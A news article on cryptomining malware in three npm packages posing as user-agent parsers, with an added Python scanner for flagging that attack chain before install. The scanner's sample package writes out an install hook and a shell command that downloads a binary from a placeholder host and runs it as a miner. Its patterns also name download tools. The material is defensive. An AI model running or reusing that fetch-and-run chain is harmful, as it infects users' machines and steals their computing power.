[TheRecord] Crypto-miner found hidden inside three npm libraries

DevOps security firm Sonatype has uncovered crypto-mining malware hidden inside three JavaScript libraries uploaded on the official npm package repository.

The three files, disguised as user-agent string parsers, would detect the user’s operating system and then run a BAT or Shell script, based on the victim’s platform.

“These scripts then download an externally-hosted EXE or a Linux ELF, and execute the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to utilize,” said Sonatype security researcher Ali ElShakankiry, who discovered the campaign.

This campaign’s specifics include:

- The names of the three npm packages were: klow, klown, and okhsa.
- The packages were live only for a day, on October 15.
- None of the three libraries were downloaded more than 150 times, individually.
- The final payloads (cryptominers) could run on Windows or Linux platforms.
- All three packages were uploaded from the same account.
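The behaviour described above (an OS check, a platform-specific BAT or shell script, then an externally fetched EXE/ELF launched with pool, wallet and thread arguments) is a recognisable chain that can be flagged before a package is installed. The following is an added example of a simple static triage script, not code from Sonatype or from the packages themselves; the sample package contents, the placeholder URL and wallet string, and the assumption that the chain is triggered from a package.json lifecycle hook are all constructed for illustration.

```python
import json
import re
from typing import Dict, List

# Constructed sample that mirrors the chain the article describes.
# The package name, the postinstall hook, the URL and the wallet value are
# placeholders/assumptions, not artefacts of the real klow/klown/okhsa packages.
SUSPICIOUS_PACKAGE: Dict[str, str] = {
    "package.json": json.dumps({
        "name": "example-ua-parser",
        "version": "1.0.0",
        "description": "user-agent string parser",
        "scripts": {"postinstall": "node index.js"},  # assumed trigger point
    }),
    "index.js": """
const os = require('os');
const { execSync } = require('child_process');
if (os.platform() === 'win32') {
  execSync('cmd /c run.bat');
} else {
  execSync('sh run.sh');
}
""",
    "run.sh": (
        "curl -s -o /tmp/m http://example.invalid/m.elf && chmod +x /tmp/m && "
        "/tmp/m --pool pool.example.invalid:3333 --wallet WALLET_PLACEHOLDER --threads 4\n"
    ),
}

# Constructed benign package: a real user-agent parser has no reason to probe
# the host OS, spawn scripts, or download binaries.
BENIGN_PACKAGE: Dict[str, str] = {
    "package.json": json.dumps({
        "name": "example-ua-parser-clean",
        "version": "1.0.0",
        "main": "index.js",
    }),
    "index.js": "module.exports = (ua) => ({ isWindows: /Windows NT/.test(ua), "
                "isLinux: /Linux/.test(ua) });\n",
}

# Lifecycle hooks that npm runs automatically during install.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators for each stage of the chain described in the article.
OS_PROBE = re.compile(r"os\.platform\(\)|process\.platform")
EXEC_CALL = re.compile(r"child_process|execSync|spawnSync|spawn\(|exec\(")
SCRIPT_LAUNCH = re.compile(r"\.(bat|cmd|sh)\b")
DOWNLOAD = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|certutil)\b|https?://\S+\.(exe|elf|bin)\b"
)
MINER_ARGS = re.compile(r"--?(pool|wallet|threads)\b", re.IGNORECASE)


def scan_package(files: Dict[str, str]) -> List[str]:
    """Return human-readable findings for a package given as {path: contents}."""
    findings: List[str] = []

    pkg = json.loads(files.get("package.json", "{}"))
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(f"package.json: lifecycle hook '{hook}' runs code at install time: {cmd}")

    for name, body in files.items():
        if name == "package.json":
            continue
        # Stage 1+2: detect the host OS, then hand off to a .bat/.sh script.
        if OS_PROBE.search(body) and EXEC_CALL.search(body) and SCRIPT_LAUNCH.search(body):
            findings.append(f"{name}: OS check followed by launching a .bat/.sh script")
        # Stage 3: fetch an external binary and run it with miner-style arguments.
        if DOWNLOAD.search(body) and MINER_ARGS.search(body):
            findings.append(f"{name}: downloads a binary and runs it with pool/wallet/thread arguments")
    return findings


def is_suspicious(files: Dict[str, str]) -> bool:
    """Require two independent indicators before flagging, to limit false positives."""
    return len(scan_package(files)) >= 2


if __name__ == "__main__":
    for label, pkg in (("suspicious", SUSPICIOUS_PACKAGE), ("benign", BENIGN_PACKAGE)):
        print(label, is_suspicious(pkg), scan_package(pkg))
```

Each regex is deliberately coarse; the value is in requiring several stages of the chain to co-occur, which a genuine user-agent parser never needs. Run it over an unpacked tarball (for example the output of `npm pack`) before the package reaches a CI runner or developer machine, where the lifecycle hook would otherwise execute automatically.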

The number of malicious packages found on the npm repository has been rising, but this is better read as a positive sign than a negative one: it is the byproduct of companies like Snyk and Sonatype constantly monitoring new uploads and package updates for malicious code, catching miscreants before they do more damage and before the packages are downloaded thousands of times into real-world projects.

The post Crypto-miner found hidden inside three npm libraries appeared first on The Record by Recorded Future.

